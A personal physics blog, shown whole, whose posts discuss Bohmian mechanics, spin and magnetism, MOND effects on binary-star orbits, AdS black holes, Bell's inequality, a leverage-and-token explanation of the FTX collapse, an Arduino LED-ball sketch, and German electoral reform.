atdotde

What happens to particles after they have been interacting according to Bohm?

2024-05-22T15:41:00.000+02:00

Once more, I am trying to better understand the Bohmian or pilot wave approach to quantum mechanics. And I came across this technical question, which I have not been able to successfully answer from the literature:

Consider a particle, described by a wave function $\psi(x)$ and a Bohmian position $q$ that both happily evolve in time according to the Schrödinger equation and the Bohmian equation of motion along the flow field. Now, at some point in time, the (actual) position of that particle gets recorded, either on a photographic plate or by flying through a bubble chamber or similar.
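For reference, the two evolution laws meant here can be written down in their standard textbook form for a single spinless particle. The symbols $m$ (mass), $V$ (potential) and $\hbar$ do not appear elsewhere in this post and are introduced only for this sketch:

$$i\hbar\,\partial_t\psi = -\frac{\hbar^2}{2m}\Delta\psi + V\psi,\qquad \dot q(t) = \frac{\hbar}{m}\,\mathrm{Im}\,\frac{\nabla\psi}{\psi}\bigg|_{x=q(t)}.$$

The right-hand side of the second equation is the probability current divided by $|\psi|^2$, which is why positions that are distributed according to $|\psi|^2$ at one time stay so distributed at later times.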

Unless I am mistaken, following the "having a position is the defining property of a particle" mantra, what is getting recorded is $q$. After all, the fact that there is exactly one place on a photographic plate that gets dark was the original motivation for introducing the particle position denoted by $q$. So far, so good (I hope).

My question, however, is: What happens next? What value of $q$ am I supposed to take for the further time evolution? I see three possibilities:

1. I use the $q$ that was recorded.
2. Thanks to the recording, the wave function collapses to an appropriate eigenstate (possibly my measurement was not exact, I just inferred that the particle is inside some interval, then the wave function only gets projected to that interval) and thanks to the interaction all I can know is that $q$ is then randomly distributed according to $|P\psi|^2$ (where $P$ is the projector) ("new equilibrium").
3. Anything can happen, depending on the detailed inner workings and degrees of freedom of the recording device, after all the Bohmian flow equation is non-local and involves all degrees of freedom in the universe.
4. Something else

All three sound somewhat reasonable, but upon further inspection, all of them have drawbacks: If option 1 were the case, the recording would have just prepared the position $q$ for the further evolution. Allowing this to happen opens the door to faster than light signalling, as I explained before in this paper. Option 2 gives up the deterministic nature of the theory and allows for random jumps of the "true" position of the particle. This is even worse for option 3: Of course, you can always say this and think you are safe. But if there are other particles beyond the one recorded and their wave functions are entangled, option 3 completely gives up on making any prediction about the future of those other particles as well. Note that more orthodox interpretations of quantum mechanics (like Copenhagen, whatever you understand under this name) do make very precise predictions about those other particles after an entangled one has been measured. So that would be a shortcoming of the Bohmian approach.

I am honestly interested in the answer to this question. So please comment if you know or have an opinion!

How do magnets work?

2024-01-24T16:45:00.004+01:00

I came across this excerpt from a Christian home schooling book:

which is of course funny in so many ways, not least because the whole process of "seeing" is electromagnetic at its very core and of course most people will have felt electricity at some point in their life. Even historically, this is pretty much how it was discovered by Galvani (using frogs' legs) at a time when electricity was about cat skins and amber.

It also brings to mind this quite famous YouTube video that shows Feynman being interviewed by the BBC, first getting somewhat angry about the question of how magnets work and then going into a quite deep explanation of what it means to explain something.

But how do magnets work? When I look at what my kids are taught in school, it basically boils down to "a magnet is made up of tiny magnets that all align" which if you think about it is actually a non-explanation. Can we do better (using more than layman's physics)? What is it exactly that makes magnets behave like magnets?

I would define magnetism as the force that moving charges feel in an electromagnetic field (the part proportional to the velocity) or said the other way round: The magnetic field is the field that is caused by moving charges. Using this definition, my interpretation of the question about magnets is then why permanent magnets feel this force. For the permanent magnets, I want to use the "they are made of tiny magnets" line of thought but remove the circularity of the argument by replacing it by "they are made of tiny spins".

This transforms the question to "Why do the elementary particles that make up matter feel the same force as moving charges even if they are not moving?".

And this question has an answer: Because they are Dirac particles! At small energies, the Dirac equation reduces to the Pauli equation which involves the term (thanks to minimal coupling)

$$(\vec\sigma\cdot(\vec p+q\vec A))^2$$

and when you expand the square that contains (in Coulomb gauge)

$$(\vec\sigma\cdot \vec p)(\vec\sigma\cdot q\vec A)= q\vec A\cdot\vec p + i(\vec p\times q\vec A)\cdot\vec\sigma$$

Here, the first term is the one responsible for the interaction of the magnetic field and moving charges while the second one couples $\nabla\times\vec A$ to the operator $\vec\sigma$, i.e. the spin. And since you need to have both terms, this links the force on moving charges to this property we call spin. If you like, the fact that the g-factor is not vanishing is the core of the explanation how magnets work.
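The algebraic identity behind this expansion is $(\vec\sigma\cdot\vec a)(\vec\sigma\cdot\vec b)=\vec a\cdot\vec b+i\,\vec\sigma\cdot(\vec a\times\vec b)$. As a minimal sketch, it can be checked numerically for ordinary number-valued vectors. For the operators $\vec p$ and $\vec A$ the ordering matters in addition, which this check does not capture. The helper names `sigma_dot` and `pauli_identity_holds` are made up for this illustration.

```python
import numpy as np

# The three Pauli matrices, stacked along the first axis.
SIGMA = np.array([
    [[0, 1], [1, 0]],
    [[0, -1j], [1j, 0]],
    [[1, 0], [0, -1]],
], dtype=complex)


def sigma_dot(v):
    """Return the 2x2 matrix sigma . v for a real 3-vector v."""
    return np.einsum("i,ijk->jk", np.asarray(v, dtype=complex), SIGMA)


def pauli_identity_holds(a, b):
    """Check (sigma.a)(sigma.b) = (a.b) 1 + i sigma.(a x b) numerically."""
    lhs = sigma_dot(a) @ sigma_dot(b)
    rhs = np.dot(a, b) * np.eye(2) + 1j * sigma_dot(np.cross(a, b))
    return bool(np.allclose(lhs, rhs))


rng = np.random.default_rng(0)
a, b = rng.normal(size=3), rng.normal(size=3)
print(pauli_identity_holds(a, b))
```

The cross-product part is the one that carries $\vec\sigma$, and it is the piece that ends up coupling the spin to $\nabla\times\vec A$.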

And if you want, you can add spin-statistics, which then implies the full "stability of matter" story that in the end is responsible for the fact that you can form macroscopic objects out of Dirac particles that can be magnets.

How not to detect MOND

2023-11-13T21:53:00.001+01:00

You might have heard about recent efforts to inspect lots of "wide binaries", double stars that orbit each other at very large distances, which is one of the tasks the Gaia mission was built for, to determine if their dynamics follows Newtonian gravity or rather MOND, the modified Newtonian dynamics (Einstein's theory plays no role at such weak fields).

You can learn about the latest update from this video by Dr. Betty (spoiler: Newton's just fine).

MOND is an alternative theory of gravity that was originally proposed as an alternative to dark matter to explain galactic rotation curves (which it does quite well, some argue better than dark matter). Since then, it has been investigated in other weak gravity situations as well. In short, it introduces an additional scale $a_0$ with the dimension of an acceleration and posits that the gravitational acceleration (either in Newton's law of gravity or in Newton's second law) is weakened by a factor

$$\mu(a)=\frac{a}{\sqrt{a^2+a_0^2}}$$

where $a$ is the acceleration without the correction.

In the recent studies reported on in the video, people measure the stars' velocities and have to do statistics because they don't know about the orbital parameters and the orientation of the orbit relative to the line of sight.

That gave me an idea of what else one could try: When the law of gravity gets modified from its $1/r^2$ form for large separations and correspondingly small gravitational accelerations, the orbits will no longer be Kepler ellipses. What happens, for example, if this modified dynamics results in eccentricities growing or shrinking systematically? Then we might observe too many binaries with large/small eccentricities and that would be an indication of a modified gravitational law.

The only question is: What does the modification result in? A quick internet search did not reveal anything useful combining celestial mechanics and MOND, so I had to figure it out myself. Inspection shows that you can absorb the modification into the force law, replacing the $1/r^2$ force by

$$\mu(1/r^2) \frac{\vec r}{r^3}$$

and thus into a corresponding new gravitational potential. Thus much of the usual analysis carries over: Energy and angular momentum would still be conserved and one can go into the center of mass system and work with the reduced mass of the system. And I will use units in which $GM=1$ to simplify calculations.

The only thing that will no longer be conserved is the Runge-Lenz vector

$$\vec A= \vec p\times\vec L - \vec e_r.$$

$\vec A$ points in the direction of the semi-major axis and its length equals the eccentricity of the ellipse.

Just recall that in Newtonian gravity, this is an additional constant of motion (which made the system $SO(4,2)$ rather than $SO(3)$ symmetric and is responsible for states with different $\ell$ being degenerate in energy for the hydrogen atom), as one can easily check

$$\dot{\vec A} = \{H, \vec A\}= \dot{\vec p}\times \vec L-\dot{\vec e_r}=\dots=0$$

using the equations of motion in the first term.

To test this idea I started Mathematica and used the numerical ODE solver to solve the modified equations of motion and plot the resulting orbit. I used initial data that implies a large eccentricity (so one can easily see the orientation of the ellipse) and an $a_0$ that kicks in for about the more distant half of the orbit.
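The same experiment can be sketched without Mathematica. The following is not the original notebook but a minimal stand-in under stated assumptions: a hand-written fourth-order Runge-Kutta step instead of Mathematica's solver, units with $GM=1$ and unit reduced mass, motion in the orbital plane, and made-up initial data (start at distance 1 with tangential speed 0.5, which gives eccentricity 0.75 in the Newtonian case). The function names and the value $a_0=1$ are choices for this illustration only.

```python
import math


def mu(a, a0):
    """Interpolation factor mu(a) = a / sqrt(a^2 + a0^2); equals 1 for a0 = 0."""
    return a / math.sqrt(a * a + a0 * a0)


def acceleration(x, y, a0):
    """Modified force per unit mass: -mu(1/r^2) * r_vec / r^3 (GM = 1)."""
    r = math.hypot(x, y)
    factor = mu(1.0 / r**2, a0) / r**3
    return -factor * x, -factor * y


def runge_lenz(x, y, vx, vy):
    """In-plane components of A = p x L - e_r for unit mass."""
    r = math.hypot(x, y)
    ang_mom = x * vy - y * vx  # z component of L
    return vy * ang_mom - x / r, -vx * ang_mom - y / r


def rk4_step(state, dt, a0):
    """One classical Runge-Kutta step for state = (x, y, vx, vy)."""
    def deriv(s):
        x, y, vx, vy = s
        ax, ay = acceleration(x, y, a0)
        return (vx, vy, ax, ay)

    def shifted(s, k, h):
        return tuple(si + h * ki for si, ki in zip(s, k))

    k1 = deriv(state)
    k2 = deriv(shifted(state, k1, dt / 2))
    k3 = deriv(shifted(state, k2, dt / 2))
    k4 = deriv(shifted(state, k3, dt))
    return tuple(
        s + dt / 6 * (a + 2 * b + 2 * c + d)
        for s, a, b, c, d in zip(state, k1, k2, k3, k4)
    )


def runge_lenz_track(a0, t_end=10.0, dt=1e-3, state=(1.0, 0.0, 0.0, 0.5)):
    """Integrate the orbit and return the list of (A_x, A_y) at every step."""
    track = [runge_lenz(*state)]
    for _ in range(int(round(t_end / dt))):
        state = rk4_step(state, dt, a0)
        track.append(runge_lenz(*state))
    return track


newton = runge_lenz_track(a0=0.0)  # A stays put up to integration error
mond = runge_lenz_track(a0=1.0)    # A starts to move
```

Plotting the points in `mond` gives the path of the would-be Runge-Lenz vector, and `math.hypot(ax, ay)` for each point gives the instantaneous eccentricity.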

Clearly, the orbit is no longer elliptic but precesses around the center of the potential. On the other hand, it does not look like the instantaneous ellipses would get rounder or narrower. So let's plot the orbit of the would-be Runge-Lenz vector:

Orbit of the would-be Runge-Lenz vector $\vec A$

What a disappointment! Even if it is no longer conserved it seems to move on a circle with some additional wiggles on it (Did anybody mention epicycles?). So it is only the orientation of the orbit that changes with time but there is no general trend toward smaller or larger eccentricities that one might look out for in real data.

On the other hand, the eccentricity $\|\vec A\|$ is not exactly conserved: it wiggles a bit along the orbit but comes back to its original value after one full rotation. Can we understand that analytically?

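To this end, we make use of the fact that the equation of motion enters only in the first term when computing the time derivative of $\vec A$. With the modified force, $\dot{\vec p}=-\mu(1/r^2)\,\vec e_r/r^2$, and since $-\frac{\vec e_r}{r^2}\times\vec L=\dot{\vec e_r}$ (this is the identity that makes $\vec A$ conserved in the Newtonian case), the first term becomes $\mu(1/r^2)\,\dot{\vec e_r}$, so that

$$\dot{\vec A}=-\left(1-\mu(1/r^2)\right) \dot{\vec e_r}.$$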

$\mu$ differs from 1 far away from the center, where the acceleration is weakest. On the other hand, since $\vec e_r$ is a unit vector, its time derivative has to be orthogonal to it. But in the far away part of the ellipse, $\vec e_r$ is almost parallel to the semi-major axis and thus to $\vec A$, so $\dot{\vec A}$ is almost orthogonal to $\vec A$. Furthermore, due to the reflection symmetry of the ellipse, the parts of $\dot{\vec e_r}$ that are not orthogonal to $\vec A$ cancel between the two sides, and thus the wiggling around the average $\|\vec A\|$ is periodic with the period of the orbit. q.e.d.

There is only a tiny net effect since the ellipse is not exactly symmetric but precesses a little bit. This can be seen when plotting $\|\vec A\|$ as a function of time:

$\|\vec A\|$ as a function of time for the first 1000 units of time (brown) and from time 9000 to 10,000 (red)

The same plot zoomed in. One can see that the brown line's minimum is slightly below the red one.

If one looks very carefully, one sees a tiny trend towards larger values of eccentricity.

This is probably far too weak to have any observable consequence (in particular since there are a million other perturbing effects), but these numerics suggest that binaries whose orbits probe the MOND regime for a long time should show slightly larger eccentricities on average.

So Gaia people, go out and check this!

Can you create a black hole in AdS?

2023-04-28T10:53:00.004+02:00

Here is a little puzzle I just came up with when in today's hep-th serving I found

arXiv:2304.14351 [pdf, other]
Operator growth and black hole formation
Felix M. Haehl, Ying Zhao
Comments: 20+9 pages, 10 figures. arXiv admin note: text overlap with arXiv:2104.02736
Subjects: High Energy Physics - Theory (hep-th); General Relativity and Quantum Cosmology (gr-qc); Quantum Physics (quant-ph)
When two particles collide in an asymptotically AdS spacetime with high enough energy and small enough impact parameter, they can form a black hole.

But to explain it, I should probably say one or two things about thermal states in the algebraic QFT language: There (as we teach for example in our "Mathematical Statistical Physics" class) you take care to distinguish (quasi-local) observables, which form a C*-algebra, from representations of these on a Hilbert space. In particular, as for example for Lie algebras, there can be inequivalent representations, that is, different Hilbert spaces where the observables act as operators but where there are no (quasi-local) operators that you can use to act on a vector state in one Hilbert space to bring you to the other Hilbert space. The different Hilbert space representations are different super-selection sectors of the theory.

A typical example are states of different density in infinite volume: The difference in particle number is infinite but any finite product of creation and annihilation operators cannot change the particle number by an infinite amount. Or said differently: In Fock space, there are only states with arbitrary but finite particle number, trying to change that you run into IR divergent operators.

Similarly, assuming that the (weak closure) of the representation on one Hilbert space is a type III factor, as it should be for a good QFT, states of different temperatures (KMS states in that language) are disjoint, meaning they live in different Hilbert spaces and you cannot go from one to the other by acting with a quasi-local operator. This is proven as Theorem 5.3.35 in volume 2 of the Bratteli/Robinson textbook.

Now to the AdS black holes: Start with empty AdS space also encoded by the vacuum in the holographic boundary theory. Now, at t=0 you act with two boundary operators (obviously quasi-local) to create two strong gravitational wave packets heading towards each other with very small impact parameter. Assuming the hoop conjecture, they will create a black hole when they collide (probably plus some outgoing gravitational radiation).

Then we wait long enough for things to settle (but not so long that the black hole starts to evaporate by a significant amount). We should be left with some AdS-Kerr black hole. From the boundary perspective, this should now be a thermal state (of the black hole temperature) according to the usual dictionary.

So, from the point of view of the boundary, we started from the vacuum, acted with local operators and ended up in a thermal state. But this is exactly what the abstract reasoning above says is impossible.

How can this be? Comments are open!

Get Rich Fast

2022-11-26T12:23:00.002+01:00

I wrote a text as a comment on the episode of the Logbuch Netzpolitik podcast on the FTX debacle but could not post it to the comment section (because that appears to be disabled). So in order not to waste it, I post it here (originally written in German):

1. Leverage: If, say, I believe that Apple stock will keep rising, I can buy one Apple share to profit from that. It currently costs about 142 euros; if I buy one and the price rises to 150 euros, I have of course made a profit of 8 euros. Better still if I buy 100, then I make 800 euros. The only obstacle is that I may not have 14200 euros available. No problem: I simply take out a loan for the price of 99 shares (that is, 14058 euros). For simplicity, let us ignore that I have to pay interest on it; that only makes the whole game less attractive for me. So I buy 100 shares, 99 of them on credit. Once the price is at 150, I sell them again, pay back the loan and go home with 800 euros more. I have thus multiplied the price gain a hundredfold.

The catch is that I multiply the risk of loss a hundredfold as well: if, contrary to my optimistic expectations, the share price falls, it can quickly happen that selling the shares no longer raises enough money to pay back the loan. That happens when the 100 shares are worth less than the loan, that is, when the share price falls below 140.58 euros. If I sell my shares at that moment, I can just about pay my debt, but I have completely lost my equity, which was the one share I bought with my own money. If the price has fallen even lower, however, speculating on credit can lose me more than all my money: I have nothing left and still have not paid off my debt. Of course, the bank that gave me the loan is afraid of exactly that, so at the latest when the price has fallen to 140.58 it forces me to sell the shares, so that it gets its loan back in any case. Daniel calls this "glattstellen" (closing out the position).
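The arithmetic of step 1 can be replayed in a few lines. This is only a sketch of the toy example above (100 shares at 142 euros, one of them paid with own money, no interest); the function names are made up for this illustration.

```python
def open_position(price, shares, own_shares):
    """Buy `shares` at `price`; `own_shares` are paid with own money, the rest on credit."""
    loan = (shares - own_shares) * price
    equity = own_shares * price
    return loan, equity


def equity_after(price_now, shares, loan):
    """What is left after selling all shares at `price_now` and repaying the loan."""
    return shares * price_now - loan


def close_out_price(shares, loan):
    """Share price at which the shares are worth exactly as much as the loan."""
    return loan / shares


loan, equity = open_position(price=142, shares=100, own_shares=1)
print(loan)                                    # size of the loan in euros
print(equity_after(150, 100, loan) - equity)   # gain if the price rises to 150
print(close_out_price(100, loan))              # price at which the equity is gone
print(equity_after(135, 100, loan))            # negative: debt remains after selling
```

The last line shows the case the bank is worried about: below the close-out price, selling everything no longer covers the loan.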

2. Naturally, I find that annoying, because the price falls by those 1.42 euros much more quickly than it rises by 8 euros. To prevent it, I can deposit other things of value with the bank, for example my iPhone, which is still worth 100 euros. Then the bank only forces me to sell my shares when the value of the shares plus the 100 euros for the iPhone falls below the value of the loan. After all, it could still sell the iPhone to get its money back. If I have no iPhone to deposit, I have to deposit something else of value with the bank (collateral).

3. This is where the tokens come in. I can make up 1000 crypto tokens (whether they are tied to ownership of computer-generated cartoons of Tim and Linus does not matter). Since I have merely made them up, this does not get me anywhere yet: as they stand, they have no value. I can try to sell them, but I will only be laughed at. This is where my second company, the investment fund, comes in: with it, I buy 100 of the tokens from myself at a price of 30 euros apiece. If it is not obvious that I bought the things from myself (possibly via a straw man or woman), it looks as if the tokens were seriously being traded at 30 euros. In addition, I sell another 100 to the customers of my fund, also for 30 euros, with the promise that holders of the coins get a discount on my fund's fees. By now at the latest, the value of 30 euros per token is established. Of the original 1000 I still have 800. Now I can claim to own assets worth 24000 euros, because that is 800 times 30 euros. I have created these assets more or less out of thin air, since the assumption that I could also find real buyers for the other 800 at this price is nonsense.

But if I only disguise the whole thing well enough, somebody may believe that I really am sitting on assets worth 24000 euros. In particular, the bank from steps 1 and 2 may believe it, and I can deposit these tokens as collateral for the loan and thereby take out even bigger loans to buy Apple shares with.

The whole thing only blows up when the share price falls so far that the bank insists on the loan being paid back. Then I have to sell not only the shares and the iPhone but also the remaining tokens. And then I am caught with my trousers down, because it becomes clear that of course nobody wants the tokens I simply made up, and certainly not for 30 euros. In Daniel's words, what is missing then is the "liquidity".

That, as far as I understand it, is what happened, of course not with Apple shares and iPhones, but in principle. And the point of doing business in a circle with yourself is precisely to artificially drive up the apparent price of something of which you hold a lot more. The flaw in the whole thing is that it is hard to judge the value of something that is not really being traded, or whose value rests only on other assumed values, where the assumptions about those values can change very quickly once somebody says "show me!" and there are no real assets (traditionally factories, know-how etc.) behind it.

No action at a distance, spooky or not

2022-10-04T21:23:00.004+02:00

On the occasion of the announcement of the Nobel prize for Aspect, Clauser and Zeilinger for the experimental verification that quantum theory violates Bell's inequality, there seems to be a strong urge in popular explanations to state that this proves that quantum theory is non-local, that entanglement is somehow a strong bond between quantum systems and people quote Einstein on the "spooky action at a distance".

But it should be clear (and I have talked about this here before) that this is not a necessary consequence of the Bell inequality violation. There is a way to keep locality in quantum theory (at the price of "realism" in a technical sense as we will see below). And that is not just a convenience: In fact, quantum field theory (and the whole idea of a field mediating interactions between distant entities like the earth and the sun) is built on the idea of locality. This is most strongly emphasised in the Haag-Kastler approach (algebraic quantum field theory), where pretty much everything is encoded in the algebras of observables that can be measured in local regions and how these algebras fit into each other. So throwing out locality with the bath water removes the basis of QFT. And I am convinced this is the reason why there is no good version of QFT in the Bohmian approach (which famously sacrifices locality to preserve realism, something some of its proponents do not even acknowledge as an assumption, since it is there in the classical theory and it takes some abstraction to realise that it is actually an assumption and not God-given).

But let's get technical. To be specific, I will use the CHSH version of the Bell inequality (but you could as well use the original one or the GHZ version as Coleman does). This is about particles that have two different properties, here termed A and B. These can be measured and the outcome of this measurement can be either +1 or -1. An example could be spin 1/2 particles and A and B representing twice the components of the spin in either the x or the y direction respectively.

Now, we have two such particles with these properties A and B for particle 1 and A' and B' for particle 2. CHSH instruct you to look at the expectation value of the combined observable

\[A (A'+B') + B (A'-B').\]

Let's first do the classical analysis: We don't know about the two properties of particle 2, the primed variables. But we know they are either equal or different. In case they are equal, the absolute value of A'+B' is 2 while A'-B'=0. If they are different, we have A'+B'=0 while the absolute value of A'-B' is 2. In either case, only one of the two terms contributes, and in absolute value it is 2 times the unprimed observable of particle 1: A for equal values in particle 2 and B for different values in particle 2. No matter which possibility is realised, the absolute value of this observable is always 2.

If you allow for probabilistic outcomes of the measurements, you can convince yourself that you can also realise smaller absolute values than 2 but never larger ones. So much for the classical analysis.

In quantum theory, you can, however, write down an entangled state of the two particle system (in the spin 1/2 case specifically) where this expectation value is 2 times the square root of 2, so larger than all the possible classical values. But didn't we just prove it cannot be larger than 2?
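Both halves of this argument can be checked by brute force. The sketch below first enumerates all 16 classical assignments of $\pm1$ to A, B, A', B', and then takes A, B (and A', B') to be the Pauli matrices $\sigma_x$, $\sigma_y$ (twice the spin components, as in the example above) and computes the largest eigenvalue of the combined observable on the two-particle Hilbert space. The corresponding eigenvector is an entangled state that reaches this value. Function names are made up for this illustration.

```python
import itertools

import numpy as np


def chsh_classical_values():
    """All values of A(A'+B') + B(A'-B') for A, B, A', B' in {+1, -1}."""
    return {
        a * (ap + bp) + b * (ap - bp)
        for a, b, ap, bp in itertools.product((+1, -1), repeat=4)
    }


SX = np.array([[0, 1], [1, 0]], dtype=complex)
SY = np.array([[0, -1j], [1j, 0]], dtype=complex)


def chsh_operator():
    """A x (A'+B') + B x (A'-B') with A = A' = sigma_x and B = B' = sigma_y."""
    return np.kron(SX, SX + SY) + np.kron(SY, SX - SY)


def max_quantum_value():
    """Largest eigenvalue of the CHSH operator and a state that attains it."""
    eigenvalues, eigenvectors = np.linalg.eigh(chsh_operator())
    return eigenvalues[-1], eigenvectors[:, -1]


print(chsh_classical_values())
value, state = max_quantum_value()
print(value, 2 * np.sqrt(2))
```

Averaging over classical assignments can only produce values between the two classical extremes, while the quantum expectation value in the state `state` lies outside that range.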

If you are ready to give up locality you can now say that there is a non-local interaction that tells particle 2 if we measure A or B on particle one and by this adjust its value that is measured at the site of particle two. This is, I presume, what the Bohmians would argue (even though I have never seen a version of this experiment spelled out in detail in the Bohmian setting with a full analysis of the particles following the guiding equation).

But as I said above, I would rather give up realism: In the formula above and the classical argument, we say things like "A' and B' are either the same or opposite". Note, however, that in the case of spins, you cannot measure both the spin in the x and in the y direction on the same particle because they do not commute and there is the uncertainty relation. You can measure either of them, but once you have decided you cannot measure the other (in the same round of the experiment). To give up realism simply means that you don't try to assign a value to an observable that you cannot measure because it is not compatible with what you actually measure. If you measure the spin in the x direction, it is no longer the case that the spin in the y direction is either +1/2 or -1/2 and you just don't know because you did not measure it; in the non-realistic theory you must not assign any value to it if you measured the x spin. (Of course you can still measure A+B, but that is a spin in a diagonal direction and then you measure neither the x nor the y spin.)

You just have to refuse to make statements like "the spin in x and y directions are either the same or opposite" as they involve things that cannot all be measured, so this statement would be non-observable anyways. And without these types of statement, the "proof" of the inequality goes down the drain and this is how the quantum theory can avoid it. Just don't talk about things you cannot measure in principle (metaphysical statements if you like) and you can keep our beloved locality.

Giving the Playground Express a Spin

2022-07-21T20:32:00.001+02:00

The latest addition to our single chip computer zoo is Adafruit's Circuit Playground Express. It is sold for about $30 and comes with a lot of GPIO pins, 10 RGB LEDs, a small speaker, lots of sensors (including acceleration, temperature, IR,...) and 1.5MB of flash rom. The excuse for buying it is that I might interest the kids in it (being better equipped on board than an Arduino while being less complex than a Raspberry Pi).

As the ten LEDs are arranged around the circular shape, I thought a natural idea for a first project using the accelerometer would be to simulate a ball going around the circumference.

The video does not really capture the visual impression due to overexposure of the lit LEDs.

The Circuit Playground Express comes with a graphical programming language (like Scratch) and an embedded version of Python. But you can also directly program it with the Arduino IDE to code in C which I used since this is what I am familiar with.

Here is the source code (as always with GPL 2.0)

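// A first project simulating a ball rolling around the Playground Express

#include <Adafruit_CircuitPlayground.h>

uint8_t pixeln = 0;   // index of the LED that is currently lit
float phi = 0.0;      // angular position of the ball in radians
float phid = 0.10;    // angular velocity of the ball per loop iteration

void setup() {
  CircuitPlayground.begin();
  CircuitPlayground.speaker.enable(1);
}

// Map the angle alpha (in radians) to one of the ten LEDs (0..9)
int phi2pix(float alpha) {
  alpha *= 180.0 / 3.14159265;   // radians to degrees
  alpha += 60.0;                 // offset between angle zero and LED 0
  if (alpha < 0.0)
    alpha += 360.0;
  if (alpha >= 360.0)            // >= so that the index never reaches 10
    alpha -= 360.0;

  return (int) (alpha / 36.0);   // ten LEDs, 36 degrees each
}

void loop() {
  static uint8_t lastpix = 0;
  float ax = CircuitPlayground.motionX();
  float ay = CircuitPlayground.motionY();

  // Tangential component of the measured acceleration drives the ball
  phid += 0.001 * (cos(phi) * ay - sin(phi) * ax);
  phi += phid;
  phid *= 0.997;                 // a little friction
  Serial.print(phi);

  // Keep phi in the range [0, 2 pi]
  while (phi < 0.0)
    phi += 2.0 * 3.14159265;

  while (phi > 2.0 * 3.14159265)
    phi -= 2.0 * 3.14159265;

  pixeln = phi2pix(phi);

  // Click whenever the ball moves on to the next LED (if the switch is on)
  if (pixeln != lastpix) {
    if (CircuitPlayground.slideSwitch())
      CircuitPlayground.playTone(2000, 5);
    lastpix = pixeln;
  }
  CircuitPlayground.clearPixels();
  CircuitPlayground.setPixelColor(pixeln, CircuitPlayground.colorWheel(25 * pixeln));
  delay(0);
}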
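To play with the update rule away from the board, here is a small Python model of the same loop. It is only a sketch: the constant accelerometer reading `ax = 0`, `ay = -9.8` is a made-up stand-in for a board held at a fixed tilt, and the function names are chosen for this illustration.

```python
import math


def step(phi, phid, ax, ay, gain=0.001, damping=0.997):
    """One loop iteration: accelerate along the tangent, move, apply friction."""
    phid += gain * (math.cos(phi) * ay - math.sin(phi) * ax)
    phi += phid
    phid *= damping
    phi %= 2.0 * math.pi  # keep the angle on the circle
    return phi, phid


def phi_to_pixel(phi, offset_deg=60.0, n_pixels=10):
    """Map an angle in radians to an LED index 0 .. n_pixels - 1."""
    deg = (math.degrees(phi) + offset_deg) % 360.0
    return int(deg / (360.0 / n_pixels)) % n_pixels


def settle(ax, ay, steps=20000, phi=0.0, phid=0.10):
    """Run the loop with a constant accelerometer reading and return the final angle."""
    for _ in range(steps):
        phi, phid = step(phi, phid, ax, ay)
    return phi


final_phi = settle(ax=0.0, ay=-9.8)
print(final_phi, phi_to_pixel(final_phi))
```

With a constant reading the ball oscillates around the angle where the tangential component of the acceleration vanishes, and the friction factor lets it come to rest there.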

Voting systems, once more

2022-07-09T13:46:00.004+02:00

Over the last few days, I have been involved in some heated Twitter discussions around a possible reform of the voting system for the German parliament. Those have sharpened my understanding of one or two things and that's why I think it's worthwhile writing a blog post about it.

The root of the problem is that the system currently in use tries to optimise two goals which are not necessarily compatible: Proportional representation (number of seats for a party should be proportional to votes received) and local representation (each constituency being represented by at least one MP). If you only wanted to optimise the first, you would not have constituencies but collect all votes in one big bucket and assign seats accordingly to the competing parties; if you only wanted to optimise the second goal, you would use a first past the post (FPTP) voting system like in the UK or the US.

In a nutshell (glossing over some additional complications), the current system is as follows: We start by assuming there are twice as many seats in parliament as there are constituencies. Each voter has two different votes. The first is a FPTP vote that determines a local candidate who will definitely get a seat in parliament. The second vote is the proportional vote that determines the percentage of seats for the parties. The parties will then send further MPs to reach their allocated lot, but the winners of the constituencies are counted as well and the parties only "fill up" the remaining seats from their party list. So far so good, you have achieved both goals: There is one winner MP from each constituency and the parties have seats proportional to the number of (second) votes. Great.

Well, except if a party wins more constituencies than it is assigned seats according to proportional votes. This was not so much of a problem some decades ago when there were two major parties (conservative and social democrat) and one or two smaller ones. The two parties would somehow share the constituency wins, but since those make up only half of the total number of seats, they would not be many more than their share of total seats (which would typically be well above 30% or even 40%).

The voting system's solution to this problem is to increase the total number of seats to the minimal total number such that no party's number of won constituencies exceeds its share of total seats according to the proportional vote.
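As a toy illustration of this enlargement rule, the following sketch grows the parliament one seat at a time until every party's proportional share covers its constituency wins. It assumes a plain Sainte-Laguë (highest averages) allocation over one nationwide pool of votes; the real law has further complications that are ignored here, and the party names, vote counts and function names are invented for the example.

```python
def sainte_lague(votes, seats):
    """Distribute `seats` proportionally with the divisor sequence 1, 3, 5, ..."""
    allocation = {party: 0 for party in votes}
    for _ in range(seats):
        # The next seat goes to the party with the highest current quotient.
        best = max(votes, key=lambda p: votes[p] / (2 * allocation[p] + 1))
        allocation[best] += 1
    return allocation


def enlarged_parliament(votes, direct_wins, nominal):
    """Smallest size >= nominal at which no party has more wins than seats."""
    size = nominal
    while True:
        allocation = sainte_lague(votes, size)
        if all(allocation[p] >= direct_wins.get(p, 0) for p in votes):
            return size, allocation
        size += 1


# Six constituencies, hence a nominal size of twelve seats.
votes = {"A": 300, "B": 260, "C": 440}
direct_wins = {"A": 5, "B": 0, "C": 1}

print(sainte_lague(votes, 12))
print(enlarged_parliament(votes, direct_wins, nominal=12))
```

In this example party A wins five of the six constituencies with 30% of the votes, so the parliament has to grow until 30% of the seats amounts to five seats.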

But these days, the two former big parties have lost a lot of their support (winning only 20-25% in the last election), and four additional parties are also represented, not getting many fewer votes than the two former big ones. In the constituencies it is not rare that you win your FPTP seat with less than 30% of the votes, and in the last election as little as 18% was sufficient to win a seat. This led to the parliament having 736 seats as compared to the nominal size of 598, and there were polls not long before that election which suggested 800+ seats or possibly even over 1000.

A particular case is the CSU, the conservative party here in Bavaria (which is nominally a different party from the CDU, which is the conservative party in the rest of Germany. In Bavaria, the CDU is not competing while in the rest of the country, the CSU is not on the ballot): Still being relative winners here, they won all but one constituency but got only about 30% of the votes in Bavaria, which translates to slightly above 5% of all votes in Germany.

According to a general sentiment, 700+ seats is far too big (for a functioning parliament and also cost wise), so the system should be reformed. But people differ on how to reform it. A simple solution mathematically would be to increase the size of the constituencies to decrease their total number. So the total number of constituency winners to be matched by proportional votes would be smaller. But that solution is not very popular, with the main argument being that those constituencies would be too big for reasonable contact between the local MPs and their constituents. Another likely reason nobody really likes to talk about is that redrawing district lines by a lot would probably cause a lot of infighting in all the parties, because the candidatures would have to be completely redistributed with many established candidates losing their job. So that is off the table; after all, it's the parties in parliament which decide about the voting system by simple majority (with boundary conditions set by relatively vague rules in the constitution).

